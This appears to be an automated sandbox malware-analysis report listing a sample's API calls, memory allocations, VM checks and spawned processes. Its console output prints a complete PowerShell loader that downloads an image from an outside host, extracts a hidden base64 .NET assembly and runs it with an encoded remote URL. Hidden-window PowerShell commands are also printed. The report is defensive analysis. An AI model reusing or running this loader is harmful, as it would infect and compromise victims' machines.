WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: At line:1 char:350 console_handle: 0x00000213	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i console_handle: 0x0000021f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000022b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G console_handle: 0x00000237	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: etString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END> console_handle: 0x00000243	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: >';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.In console_handle: 0x0000024f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000025b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im console_handle: 0x00000267	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]: console_handle: 0x00000273	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly console_handle: 0x0000027f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = console_handle: 0x0000028b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40N console_handle: 0x00000297	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: i4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc') console_handle: 0x000002a3	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx console_handle: 0x000002bb	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 128 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053e9c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f188 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f088 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ea88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ea88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ea88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053ec48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053f388 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053e648 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053e648 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501c20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 26, 2023, 5:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00501b20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 26, 2023, 5:18 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (1 event)

request

GET http://apps.identrust.com/roots/dstrootcax3.p7c

Allocates read-write-execute memory (usually to unpack itself) (50 out of 423 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 1507328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01faa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0202b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02027000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0202c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02015000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02016000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02017000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02018000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02019000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 26, 2023, 5:18 p.m.	process_identifier: 932 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\.vbs)) { Copy-Item -Path .vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 